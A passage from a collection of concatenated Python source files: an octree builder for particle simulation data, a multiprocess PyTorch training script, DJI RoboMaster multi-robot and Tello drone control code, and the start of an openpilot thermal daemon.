node = Manager().dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=[], childNodes=[], particles=[], needsUpdate=True)
#node = dict(x=center[0], y=center[1], z=center[2], width=width, Nparticles=0, id=id, parentNodes=Manager().list(), childNodes=Manager().list(), particles=Manager().list(), needsUpdate=True)
self.nodes += [node]
print('CHECKING NEW NODE', self.nodes[-1])
return (node, len(self.nodes) - 1)
def findClosestNodeIndexByDistance(self, point, positions):
#there is probably a faster and more clever way to do this
#print('checking dist', point.shape, positions.shape, point, positions)
dist2 = np.sum((positions - point)**2, axis=1)
return np.argmin(dist2)
def findClosestNode(self, point, parentIndex=None):
#I am going to traverse the octree to find the closest node
if (parentIndex is None):
parentIndex = 0
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
while (len(childIndices) > 0):
childPositions = []
for i in childIndices:
childPositions.append([self.nodes[i]['x'], self.nodes[i]['y'], self.nodes[i]['z']])
parentIndex = childIndices[self.findClosestNodeIndexByDistance(point[0:3], np.array(childPositions))]
parent = self.nodes[parentIndex]
childIndices = parent['childNodes']
return (parent, parentIndex)
def createChildNodes(self, parentIndex):
#split the node into 8 separate nodes
if (self.managerDict['verbose'] > 0):
print('creating child nodes', self.nodes[parentIndex]['id'], self.nodes[parentIndex]['Nparticles'], self.nodes[parentIndex]['width'])
#check if we need to read in the file (should this be a more careful check?)
if (len(self.nodes[parentIndex]['particles']) < self.managerDict['NNodeMax']):
self.populateNodeFromFile(parentIndex)
#create the new nodes
#check to make sure node doesn't already exist, since I'm running in parallel?
n1, index1 = self.getNodeByID(self.nodes[parentIndex]['id']+'1')
if (n1 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n1, index1 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'1', width=self.nodes[parentIndex]['width']/2.)
n2, index2 = self.getNodeByID(self.nodes[parentIndex]['id']+'2')
if (n2 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n2, index2 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'2', width=self.nodes[parentIndex]['width']/2.)
n3, index3 = self.getNodeByID(self.nodes[parentIndex]['id']+'3')
if (n3 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n3, index3 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'3', width=self.nodes[parentIndex]['width']/2.)
n4, index4 = self.getNodeByID(self.nodes[parentIndex]['id']+'4')
if (n4 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] + self.nodes[parentIndex]['width']/4.
n4, index4 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'4', width=self.nodes[parentIndex]['width']/2.)
n5, index5 = self.getNodeByID(self.nodes[parentIndex]['id']+'5')
if (n5 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n5, index5 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'5', width=self.nodes[parentIndex]['width']/2.)
n6, index6 = self.getNodeByID(self.nodes[parentIndex]['id']+'6')
if (n6 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] + self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n6, index6 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'6', width=self.nodes[parentIndex]['width']/2.)
n7, index7 = self.getNodeByID(self.nodes[parentIndex]['id']+'7')
if (n7 is None):
cx = self.nodes[parentIndex]['x'] + self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n7, index7 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'7', width=self.nodes[parentIndex]['width']/2.)
n8, index8 = self.getNodeByID(self.nodes[parentIndex]['id']+'8')
if (n8 is None):
cx = self.nodes[parentIndex]['x'] - self.nodes[parentIndex]['width']/4.
cy = self.nodes[parentIndex]['y'] - self.nodes[parentIndex]['width']/4.
cz = self.nodes[parentIndex]['z'] - self.nodes[parentIndex]['width']/4.
n8, index8 = self.createNode([cx, cy, cz], self.nodes[parentIndex]['id']+'8', width=self.nodes[parentIndex]['width']/2.)
childIndices = np.array([], dtype='int')
#for i, n in enumerate([n1, n2, n3, n4, n5, n6, n7, n8]):
for i, n in enumerate([index1, index2, index3, index4, index5, index6, index7, index8]):
#add the parent and child indices to the nodes
self.nodes[n]['parentNodes'] = self.nodes[parentIndex]['parentNodes'] + [parentIndex]
childIndex = len(self.nodes)
self.nodes[parentIndex]['childNodes'] += [childIndex]
#create these so that I can divide up the parent particles
if (i == 0):
childPositions = np.array([[self.nodes[n]['x'],self.nodes[n]['y'],self.nodes[n]['z']]])
else:
childPositions = np.append(childPositions, [[self.nodes[n]['x'],self.nodes[n]['y'],self.nodes[n]['z']]], axis=0)
childIndices = np.append(childIndices, childIndex)
#divide up the particles
for p in self.nodes[parentIndex]['particles']:
child, index = self.findClosestNode(np.array(p), parentIndex=parentIndex)
self.nodes[index]['particles'] += [p]
self.nodes[index]['Nparticles'] += 1
#check how many particles ended up in each child node
# if (self.managerDict['verbose > 0):
# for i, n in enumerate([n1, n2, n3, n4, n5, n6, n7, n8]):
# print(' Child node, Nparticles', n['id'], n['Nparticles'])
# self.managerDict['checkNodeParticles(node=n)
#remove the particles from the parent
self.nodes[parentIndex]['particles'] = []
self.nodes[parentIndex]['Nparticles'] = 0
#check if we need to remove a file
nodeFile = os.path.join(self.managerDict['path'], self.nodes[parentIndex]['id'] + '.csv')
if (os.path.exists(nodeFile)):
os.remove(nodeFile)
if (self.managerDict['verbose'] > 0):
print('removing file', nodeFile)
def dumpNodesToFiles(self):
#dump all the nodes to files
if (self.managerDict['verbose'] > 0):
print('dumping nodes to files ...')
#individual nodes
for node in self.nodes:
print('checking node for file', node['Nparticles'], node['needsUpdate'], len(node['particles']))
if ( (node['Nparticles'] > 0) and ('particles' in node) and (node['needsUpdate'])):
parts = np.array(node['particles'])
nodeFile = os.path.join(self.managerDict['path'], node['id'] + '.csv')
fmt = ''
header = ''
for key in self.managerDict['keyList']:
if (key == 'Coordinates'):
fmt += '%.8e,%.8e,%.8e,'
header +='x,y,z,'
elif(key == 'Velocities'):
fmt += '%.8e,%.8e,%.8e,'
header +='vx,vy,vz,'
else:
fmt += '%.8e,'
header += key + ','
fmt = fmt[:-1] #remove the last ','
header = header[:-1] #remove the last ','
mode = 'w'
if (os.path.exists(nodeFile)):
mode = 'a'
header = ''
print('WRITING FILE', nodeFile)
with open(nodeFile, mode) as f:
np.savetxt(nodeFile, parts, fmt=fmt, header=header, comments='')
node['particles'] = []
node['needsUpdate'] = False
if (self.managerDict['verbose'] > 1):
print('writing node to file ', node['id'], mode)
#node dict
with open(os.path.join(self.managerDict['path'], 'octree.json'), 'w') as f:
json.dump(list(self.nodes), f, cls=npEncoder)
self.managerDict['count'] = 0
def checkNodeParticles(self, node=None, iden=None, index=None):
if (index is not None):
node = self.nodes[index]
if (index is None and iden is not None):
node, index = self.getNodeByID(iden)
if (index is not None):
center = [self.nodes[index]['x'], self.nodes[index]['y'], self.nodes[index]['z']]
print(' checking node...')
print(' width = ', self.nodes[index]['width'])
print(' Nparticles = ', self.nodes[index]['Nparticles'])
print(' center = ',center)
if (self.nodes[index]['Nparticles'] > 0):
if (self.nodes[index]['particles'] == [] and self.nodes[index]['Nparticles'] > 0):
self.populateNodeFromFile(index)
#get the mean position of the particles and the max width
parts = np.array(self.nodes[index]['particles'])[:,0:3]
meanPosition = np.mean(parts, axis=0)
maxPosition = np.max(parts, axis=0)
minPosition = np.min(parts, axis=0)
dist2 = np.sum((parts - np.array([center]))**2, axis=1)
width = np.max(np.sqrt(dist2))
hi = maxPosition - np.array(center)
lo = np.array(center) - minPosition
width_linear = np.max(hi - lo)
print(' mean particle position = ', meanPosition)
print(' max particle position = ', maxPosition)
print(' min particle position = ', minPosition)
print(' max distance for particle positions = ', maxPosition - minPosition)
print(' width of particles', width, width_linear)
if (width > self.nodes[index]['width']):
print(' !!!! WARNING, particles are outside width of node')
wAll = np.sqrt(dist2)
outside = np.where(wAll > self.nodes[index]['width'])[0]
outside_pick = outside[0]
#check if there is a closer node... and if not, why not!!??
for i,n in enumerate(self.nodes):
if (i == 0):
allPositions = np.array([[n['x'], n['y'], n['z']]])
else:
allPositions = np.append(allPositions, [[n['x'], n['y'], n['z']]], axis=0)
p = np.array([parts[outside_pick]])[:,0:3]
dist2 = np.sum((allPositions - p)**2., axis=1)
print(' checking this particle',p)
print(' min distance to all, base nodes',min(dist2)**0.5)
else:
print('Please specify a node or node id on input')
def getNodeByID(self, iden):
node = None
index = 0
for i,n in enumerate(self.nodes):
if (n['ID'] == iden):
node = n
index = i
break
return node, index
def checkNodeFiles(self):
#check to make sure that only the nodes with Nparticles > 0 have files
Nerror = 0
if (len(self.nodes) == 0):
print('Please compile the octree first')
return
#first get names of all expected files
names = []
Nparts = []
for n in self.nodes:
if (n['Nparticles'] > 0):
names.append(n['id'] + '.csv')
Nparts.append(n['Nparticles'])
avail = os.listdir(self.managerDict['path'])
#now check the list of available files
for fname in avail:
if ( (fname not in names) and (fname != 'octree.json')):
print('!!!WARNING: this file should not exist', fname)
Nerror += 1
#now check that all expected files exist
for i, name in enumerate(names):
if (name not in avail):
print('!!!WARNING: this file does not exist', name, Nparts[i])
Nerror += 1
print('Number of bad files = ', Nerror)
print('maximum number of particles in a file = ', max(Nparts))
print('minimum number of particles in a file = ', min(Nparts))
def populateAllNodesFromFiles(self, read = True):
Nparts = 0
#read in the octree from the json file
if (read):
with open(os.path.join(self.managerDict['path'],'octree.json')) as f:
self.nodes = json.load(f)
NbaseNodes = 0
for index, node in enumerate(self.nodes):
if (node['Nparticles'] > 0):
Nparts += node['Nparticles']
NbaseNodes += 1
self.populateNodeFromFile(index)
print('Populated octree from files.')
print(' -- total number of particles = ', Nparts)
print(' -- total number of nodes = ', len(self.nodes))
print(' -- total number of base nodes = ', NbaseNodes)
def populateNodeFromFile(self, index):
nodeFile = os.path.join(self.managerDict['path'], self.nodes[index]['id'] + '.csv')
if (self.managerDict['verbose'] > 1):
print('reading in file', nodeFile)
parts = np.genfromtxt(nodeFile, delimiter=',', skip_header=1).tolist()
self.nodes[index]['particles'] += parts
self.nodes[index]['Nparticles'] = len(self.nodes[index]['particles'])
self.nodes[index]['needsUpdate'] = True
self.managerDict['count'] += self.nodes[index]['Nparticles']
def shuffleAllParticlesInFiles(self):
if (self.managerDict['verbose'] > 0):
print('randomizing particle order in data files ... ')
#read in the octree from the json file
with open(os.path.join(self.managerDict['path'],'octree.json')) as f:
self.nodes = json.load(f)
for node in self.nodes:
if (node['Nparticles'] > 0):
nodeFile = os.path.join(self.managerDict['path'], node['id'] + '.csv')
if (self.managerDict['verbose'] > 1):
print(nodeFile)
lines = open(nodeFile).readlines()
header = lines[0]
parts = lines[1:]
random.shuffle(parts)
lines = [header] + parts
open(nodeFile, 'w').writelines(lines)
def getSizeCenter(self, inputFile=None):
#It will be easiest if we can get the center and the size at the start. This will create overhead to read in the entire file...
if (self.managerDict['verbose'] > 0):
print('calculating center and size ... ')
if (inputFile is None):
inputFile = self.managerDict['inputFile']
#open the input file
if (self.managerDict['delim'] is None):
#assume this is a hdf5 file
file = h5py.File(os.path.abspath(inputFile), 'r')
arr = file
if (self.managerDict['h5PartKey'] != ''):
arr = arr[self.managerDict['h5PartKey']]
arr = np.array(arr[self.managerDict['keyList'][0]]) #Coordinates are always first
if (self.managerDict['center'] is None):
self.managerDict['center'] = np.mean(arr, axis=0)
maxPos = np.max(arr - self.managerDict['center'], axis=0)
minPos = np.min(arr - self.managerDict['center'], axis=0)
self.managerDict['width'] = 2.*np.max(np.abs(np.append(maxPos,minPos)))
else:
#for text files
file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
self.iterFileCenter(file)
file.close()
if (self.managerDict['verbose'] > 0):
print('have initial center and size', self.managerDict['center'], self.managerDict['width'])
def iterFileCenter(self, file):
#set up the variables
#center = np.array([0.,0.,0.])
maxPos = np.array([0., 0., 0.])
minPos = np.array([0., 0., 0.])
#begin the loop to read the file line-by-line
self.managerDict['lineN'] = 0
center = np.array([0., 0., 0.])
for line in file:
self.managerDict['lineN'] += 1
if (self.managerDict['lineN'] >= self.managerDict['header']):
#get the x,y,z from the line
point = line.strip().split(self.managerDict['delim'])
coordIndices = self.managerDict['colIndices']['Coordinates']
x = float(point[coordIndices[0]])
y = float(point[coordIndices[1]])
z = float(point[coordIndices[2]])
center += np.array([x,y,z])
maxPos[0] = max([maxPos[0],x])
maxPos[1] = max([maxPos[1],y])
maxPos[2] = max([maxPos[2],z])
minPos[0] = min([minPos[0],x])
minPos[1] = min([minPos[1],y])
minPos[2] = min([minPos[2],z])
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 100000 == 0)):
print('line : ', self.managerDict['lineN'])
if (self.managerDict['lineN'] > (self.managerDict['Nmax'] - self.managerDict['header'] - 1)):
break
if (self.managerDict['center'] is None):
self.managerDict['center'] = center/(self.managerDict['lineN'] - self.managerDict['header'])
#self.managerDict['center = (maxPos + minPos)/2.
maxPos -= self.managerDict['center']
minPos -= self.managerDict['center']
self.managerDict['width'] = 2.*np.max(np.abs(np.append(maxPos, minPos)))
def initialize(self):
self.managerDict['count'] = 0
#create the output directory if needed
if (not os.path.exists(self.managerDict['path'])):
os.makedirs(self.managerDict['path'])
#remove the files in that directory
if (self.managerDict['cleanDir']):
for f in os.listdir(self.managerDict['path']):
os.remove(os.path.join(self.managerDict['path'], f))
#create the base node
(n, index) = self.createNode(self.managerDict['center'], '0', width=self.managerDict['width'])
#for some reason when running with multiprocessing, I need to return a value here. Maybe this is way to make python wait for this to complete before moving on?
return (n, index)
def addPointToOctree(self, point):
#find the node that it belongs in
node, index = self.findClosestNode(np.array(point))
if (self.managerDict['verbose'] > 2):
print('id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'], point)
#add the particle to the node
self.nodes[index]['particles'] += [point]
self.nodes[index]['needsUpdate'] = True
self.nodes[index]['Nparticles'] += 1
if (self.managerDict['verbose'] > 2):
print('After, id, Nparticles', self.nodes[index]['id'], self.nodes[index]['Nparticles'])
#check if we need to split the node
if (node['Nparticles'] >= self.managerDict['NNodeMax'] and node['width'] >= self.managerDict['minWidth']*2):
self.createChildNodes(index)
def test(self, index):
print('BEFORE',self.nodes[index]['Nparticles'])
self.nodes[index]['Nparticles'] += 1
print('AFTER',self.nodes[index]['Nparticles'])
def compileOctree(self, inputFile=None, append=False):
#initialize a few things
if (not append):
#self.getSizeCenter()
self.managerDict['center'] = [0,0,0]
self.managerDict['width'] = 1000
_ = self.initialize()
if (inputFile is None):
inputFile = self.managerDict['inputFile']
#open the input file
if (self.managerDict['delim'] is None):
#assume this is a hdf5 file
file = h5py.File(os.path.abspath(inputFile), 'r')
arr = file
if (self.managerDict['h5PartKey'] != ''):
arrPart = arr[self.managerDict['h5PartKey']]
#now build the particle array
for i, key in enumerate(self.managerDict['keyList']):
if (i == 0):
arr = np.array(arrPart[key]) #Coordinates are always first
else:
addOn = np.array(arrPart[key])
arrLen = 1
if (key == 'Velocities'): #requires special handling because it is a 2D array
arrLen = 3
arr = np.hstack((arr, np.reshape(addOn, (len(arr),arrLen))))
else:
#for text files
file = open(os.path.abspath(inputFile), 'r') #abspath converts to windows format
arr = file
self.managerDict['Nmax'] = min(self.managerDict['Nmax'], arr.shape[0])
self.iterFileOctree(arr)
# file.close()
# self.shuffleAllParticlesInFiles()
# print('done')
def iterFileOctree(self, arr):
#begin the loop to read the file line-by-line
iStart = self.managerDict['header'];
self.managerDict['lineN'] = iStart
while self.managerDict['lineN'] < self.managerDict['Nmax']:
jobs = []
for i in range(self.managerDict['Ncores']):
iEnd = int(np.floor(min(iStart + self.managerDict['NMemoryMax']/self.managerDict['Ncores'], self.managerDict['Nmax'])))
print(iStart, iEnd, self.managerDict['lineN'], arr.shape[0])
if (iStart >= iEnd):
break
j = Process(target=self.iterLinesOctree, args=(arr[iStart:iEnd], ))
#j = Process(target=self.test, args=(0,))
jobs.append(j)
iStart = iEnd
if (iEnd >= arr.shape[0]):
break
print('starting jobs', len(jobs), self.managerDict['lineN'], iEnd, self.managerDict['Nmax'])
for j in jobs:
j.start()
print('joining jobs')
for j in jobs:
j.join()
#for testing
self.managerDict['lineN'] = iEnd
#now dump to files
self.dumpNodesToFiles()
def iterLinesOctree(self, arr):
print("checking",arr.shape[0])
for i in range(arr.shape[0]):
line = arr[i]
self.managerDict['lineN'] += 1
self.managerDict['count'] += 1
#get the x,y,z from the line
if (self.managerDict['delim'] is None):
point = line
else:
lineStrip = line.strip().split(self.managerDict['delim'])
point = []
for key in self.managerDict['keyList']:
indices = self.managerDict['colIndices'][key]
if (type(indices) is not list):
indices = [indices]
for ii in indices:
point.append(float(lineStrip[ii]))
self.addPointToOctree(point)
if (self.managerDict['verbose'] > 0 and (self.managerDict['lineN'] % 1000 == 0)):
print('line : ', self.managerDict['lineN'])
if __name__ == '__main__':
oM1 = octreeStream('/Users/ageller/VISUALIZATIONS/FIREdata/m12i_res7100/snapdir_600/snapshot_600.0.hdf5',
h5PartKey = 'PartType0', keyList = ['Coordinates', 'Density', 'Velocities'],
NNodeMax = 10000, NMemoryMax = 5e4, Nmax=1e5, verbose=2, minWidth=1e-4,
cleanDir = True,
Ncores=4,
path='/Users/ageller/VISUALIZATIONS/octree_threejs_python/WebGL_octreePartition/src/data/junk/octreeNodes/Gas')
oM1.compileOctree()
|
train.py
|
import torch
import torch.multiprocessing as _mp
from core.argparser import parse_args
from core.helpers import initialize_model
from core.optimizer import GlobalAdam
from core.test import test
from core.train import train
from core.wrappers import wrap_environment
from os import environ
def main():
torch.manual_seed(123)
mp = _mp.get_context('spawn')
args = parse_args()
env = wrap_environment(args.environment, args.action_space)
global_model = initialize_model(env, args.environment, args.transfer)
if not args.force_cpu:
torch.cuda.manual_seed(123)
global_model.cuda()
global_model.share_memory()
global_optimizer = GlobalAdam(global_model.parameters(),
lr=args.learning_rate)
processes = []
for rank in range(args.num_processes):
process = mp.Process(target=train,
args=(rank, global_model, global_optimizer, args))
process.start()
processes.append(process)
process = mp.Process(target=test, args=(env, global_model, args))
process.start()
processes.append(process)
for process in processes:
process.join()
if __name__ == '__main__':
environ['OMP_NUM_THREADS'] = '1'
main()
|
multi_robot.py
|
# -*-coding:utf-8-*-
# Copyright (c) 2020 DJI.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License in the file LICENSE.txt or at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import sys
import time
import random
import threading
from robomaster import protocol
from robomaster import conn
from robomaster import robot
from robomaster import client
from robomaster import config
from . import logger
from . import tool
from . import multi_group
from . import multi_module
ROBOT_ID = 0
ROBOT_OBJ = 1
CHASSIS_LEAD_MODE = 2
GIMBAL_LEAD_MODE = 1
FREE_MODE = 0
class MultiRobotBase(object):
def __init__(self):
self._robots_list = []
self._robots_num = 0
self._group_list = [] # [group1, group2, ...]
self._robot_ip_list = [] # [robot1_ip, robot2_ip, ...]
self._robots_dict = {} # key:id, value: robot obj
def __del__(self):
pass
def initialize(self, robot_num):
"""scan all robots and init its
:param num:
:return:
"""
self._robots_list = self._scan_multi_robot(robot_num)
if not self._robots_list:
logger.error("MultiRobotBase: initialize. No robot was found!")
raise Exception("No robot was found!")
self._robots_num = len(self._robots_list)
for robot_obj in self._robots_list:
robot_obj.initialize()
def close(self):
for robot_obj in self._robots_list:
robot_obj.close()
@property
def all_robots(self):
return self._robots_list
@property
def robots_num(self):
return len(self._robots_list)
@property
def groups_num(self):
return len(self._group_list)
def _scan_multi_robot(self, num=0):
"""Automatic scanning of robots in the network
:param num:
:return:
"""
pass
def reset_all_robot(self):
for robot_obj in self._robots_list:
robot_obj.reset()
def number_id_by_sn(self, *args):
"""number id by SN
:param args: [id, SN] id int, SN str
:return:
"""
robots_sn_dict = tool.get_robots_sn(self._robots_list)
for robot_id, robot_sn in args:
if robot_sn not in robots_sn_dict.keys():
raise Exception("Robot SN {0} is not exist!".format(robot_sn))
elif robot_id in self._robots_dict.keys():
raise Exception("Id {0} cannot be reused!".format(robot_id))
elif robot_sn in self._robots_dict.values():
raise Exception("SN {0} has been numbered!".format(robot_sn))
self._robots_dict[robot_id] = robots_sn_dict[robot_sn]
logger.info("MultiRobot: number id by sn successfully")
self._robots_num = len(self._robots_dict)
return self._robots_num
def build_group(self, robot_id_list):
"""build a group that contains input robots
:param robot_list:
:return:
"""
pass
def remove_group(self, group_list):
""" remove group from MultiRobot obj
:param group_list:
:return:
"""
for group in group_list:
if group not in self._group_list:
logger.warning("MultiRobotBase group {0} do not exist".format(
group._robots_id_in_group_list))
else:
self._group_list.remove(group)
logger.info("MultiRobotBase: group {0} has removed".format(
group._robots_id_in_group_list))
def run(self, *exec_list):
"""Execute the action from the input list
:param exec_list: [robot_group, action_task]...
:return:
"""
_groups_exec_dict = {} # key: robot_group obj, value: execute thread
logger.info("MultiRobot: run exec_list: {0}".format(exec_list))
if not type(exec_list) is tuple:
tuple(exec_list)
logger.info(
"MultiRobot: run type(exec_list) is not tuple, exec_list: {0}".format(exec_list))
for robot_group, group_task in exec_list:
if robot_group not in self._group_list:
raise Exception('Input group', robot_group, 'is not built')
exec_thread = threading.Thread(target=group_task, args=(robot_group,))
exec_thread.start()
_groups_exec_dict[robot_group] = exec_thread
for robot_group, exec_thread in _groups_exec_dict.items():
exec_thread.join()
logger.info("MultiRobotBase: run, Action is completed")
class MultiEP(MultiRobotBase):
""" S1_EP"""
def __init__(self):
super().__init__()
def initialize(self, proto_type=config.DEFAULT_PROTO_TYPE):
"""scan all robots and init its
:param num:
:return:
"""
self._robots_list = self._scan_multi_robot(proto_type)
if not self._robots_list:
logger.error("MultiRobotBase: initialize. No robot was found!")
raise Exception("No robot was found!")
self._robots_num = len(self._robots_list)
for robot_obj in self._robots_list:
robot_obj.initialize(proto_type)
def _scan_multi_robot(self, proto_type=config.DEFAULT_PROTO_TYPE):
""" Automatic scanning of robots in the network
:return:
"""
robot_list = []
ip_list = conn.scan_robot_ip_list(10)
for i, ip in enumerate(ip_list):
sdk_conn = conn.SdkConnection()
proxy_addr = (ip, config.ROBOT_PROXY_PORT)
proto = protocol.ProtoSetSdkConnection()
proto._connection = 1
proto._host = protocol.host2byte(9, 6)
if config.LOCAL_IP_STR:
proto._ip = config.LOCAL_IP_STR
else:
proto._ip = '0.0.0.0'
proto._port = random.randint(config.ROBOT_SDK_PORT_MIN, config.ROBOT_SDK_PORT_MAX)
msg = protocol.Msg(robot.ROBOT_DEFAULT_HOST, protocol.host2byte(9, 0), proto)
result, local_ip = sdk_conn.switch_remote_route(msg, proxy_addr)
proto._ip = local_ip
logger.info("request connection ip:{0} port:{1}".format(proto._ip, proto._port))
if result:
conn1 = conn.Connection((proto._ip, proto._port), (ip, config.ROBOT_DEVICE_PORT),
protocol=proto_type)
logger.info("connection {0}".format(conn1))
cli = client.Client(9, 6, conn1)
rob = robot.Robot(cli)
robot_list.append(rob)
return robot_list
def build_group(self, robot_id_list):
"""build a group that contains input robots
:param robot_id_list:
:return:
"""
check_result, robot_id = tool.check_robots_id(robot_id_list, self._robots_dict)
if not check_result:
raise Exception("Robot Id %d is not exist" % robot_id)
robot_group = multi_group.RMGroup(robot_id_list, self._robots_dict)
robot_group.initialize()
self._group_list.append(robot_group)
logger.info("MultiRobot: build_group successfully, group.robots_in_group_list : {0}".format(
robot_group._robots_id_in_group_list))
return robot_group
def set_all_robots_mode(self, mode="gimbal_lead"):
"""
:param mode: free, gimbal_lead, chassis_lead
:return:
"""
all_result = True
for robot_id, robot_obj in self._robots_dict.items():
result = robot_obj.set_robot_mode(mode)
all_result = result and all_result
if not result:
print("Id %s : Set robot mode failed" % robot_id)
else:
print("Mode setup for all robots was successful")
return all_result
def number_id(self):
"""Manually number of all the robots entered at initialization.
The program will block in this function before the numbering is completed
return: the number of successful cars
"""
robot_id = 0
for robot_obj in self._robots_list:
self._robots_dict[robot_id] = robot_obj
self._number_prompt(robot_id, robot_obj)
robot_id += 1
return robot_id
class MultiDrone(MultiRobotBase):
def __init__(self):
self.robot_num = 0
self._client = tool.TelloClient()
self.tello_action = None
self._robot_host_list = []
self._group_list = []
self._robot_id_dict = {}
self._robot_sn_dict = {}
self._robot_host_dict = {}
def initialize(self, robot_num=0):
self.robot_num = robot_num
self._client.start()
self._robot_host_list = self._client.scan_multi_robot(robot_num)
def close(self):
self._client.close()
def _scan_multi_robot(self, num=0):
self.initialize(num)
_robot_ip_list = [host[0] for host in self._robot_host_list]
return _robot_ip_list
@staticmethod
def reset_all_robot():
logger.warning("Drone obj does not support this api \napi name:{}\napi location:{}"
.format(sys._getframe().f_code.co_name, sys._getframe().f_lineno))
@staticmethod
def all_robots():
logger.warning("Drone obj does not support this api \napi name:{}\napi location:{}"
.format(sys._getframe().f_code.co_name, sys._getframe().f_lineno))
@property
def robots_num(self):
return len(self._robot_host_list)
def run(self, *exec_list):
_groups_exec_dict = {}
robot_group_host_list = []
for robot_group, group_task in exec_list:
if robot_group not in self._group_list:
raise Exception('Input group', robot_group, 'is not built')
self.tello_action = multi_module.TelloAction(self._client, self._robot_id_dict, self._robot_sn_dict,
self._robot_host_dict)
exec_thread = threading.Thread(target=group_task, args=(self.tello_action.action_group(robot_group),))
_groups_exec_dict[robot_group] = exec_thread
robot_group_host_list.append(robot_group.robot_group_host_list)
# don't allow the same drone run in different group
result = tool.check_group_host(robot_group_host_list)
if result is False:
# todo BUG: low probability to has same id in one single group in number_id_to_all_drone api
raise Exception("different running groups has same id")
for robot_group, exec_thread in _groups_exec_dict.items():
# todo 多task同步待添加
exec_thread.start()
for robot_group, exec_thread in _groups_exec_dict.items():
exec_thread.join()
logger.info("MultiRobotBase: run, Action is completed")
def build_group(self, robot_id_group_list):
check_result, robot_id = tool.check_robots_id(robot_id_group_list, self._robot_id_dict)
if not check_result:
raise Exception("Robot Id %d is not exist" % robot_id)
tello_groups = multi_group.TelloGroup(self._client, robot_id_group_list,
self._robot_id_dict, self._robot_sn_dict)
self._group_list.append(tello_groups)
return tello_groups
def send_command(self, text, host_list=None):
if host_list is None:
host_list = self._robot_host_list
for host in host_list:
proto = tool.TelloProtocol(text, host)
self._client.send(proto)
def _get_sn(self, timeout=0):
self.send_command("sn?")
cur_time = time.time()
while self._client.queue.qsize() < self.robot_num:
if time.time() - cur_time > timeout:
raise Exception("get sn timeout")
while not self._client.queue.empty():
proto = self._client.queue.get()
if proto.text is None:
raise Exception("recv data is None")
self._robot_sn_dict[proto.text] = proto.host # find host by sn
time.sleep(0.1) # Tello BUG that reply ok in sn? command response
return self._robot_sn_dict
def number_id_by_sn(self, *id_sn: list, timeout=3):
if not isinstance(id_sn, tuple) and not isinstance(id_sn, list):
raise Exception("input type must be list or tuple")
self._get_sn(timeout)
for id_, sn in id_sn:
host = self._robot_sn_dict.get(sn, None)
if host is None:
raise Exception("Tello {} does not exits".format(sn))
if self._robot_id_dict.get(id_, None) is not None:
# one single id correspond to one single sn
raise Exception("id: {} has already exited".format(id_))
self._robot_id_dict[id_] = sn # find sn by id
self._robot_host_dict[host] = [id_] # find id by host
def number_id_to_all_drone(self, timeout=10):
# number all drone num that initialize by self.initialize() from 0 to oo
self._get_sn(timeout)
for id_, item in enumerate(self._robot_sn_dict.items()):
sn, host = item
self._robot_id_dict[id_] = sn # find sn by id
self._robot_host_dict[host] = [id_] # find id by host
|
thermald.py
|
#!/usr/bin/env python3
import datetime
import os
import queue
import threading
import time
from collections import OrderedDict, namedtuple
from pathlib import Path
from typing import Dict, Optional, Tuple
import psutil
import cereal.messaging as messaging
from cereal import log
from common.dict_helpers import strip_deprecated_keys
from common.filter_simple import FirstOrderFilter
from common.params import Params
from common.realtime import DT_TRML, sec_since_boot
from selfdrive.controls.lib.alertmanager import set_offroad_alert
from selfdrive.hardware import EON, HARDWARE, PC, TICI
from selfdrive.loggerd.config import get_available_percent
from selfdrive.statsd import statlog
from selfdrive.swaglog import cloudlog
from selfdrive.thermald.power_monitoring import PowerMonitoring
from selfdrive.thermald.fan_controller import EonFanController, UnoFanController, TiciFanController
from selfdrive.version import terms_version, training_version
ThermalStatus = log.DeviceState.ThermalStatus
NetworkType = log.DeviceState.NetworkType
NetworkStrength = log.DeviceState.NetworkStrength
CURRENT_TAU = 15. # 15s time constant
TEMP_TAU = 5. # 5s time constant
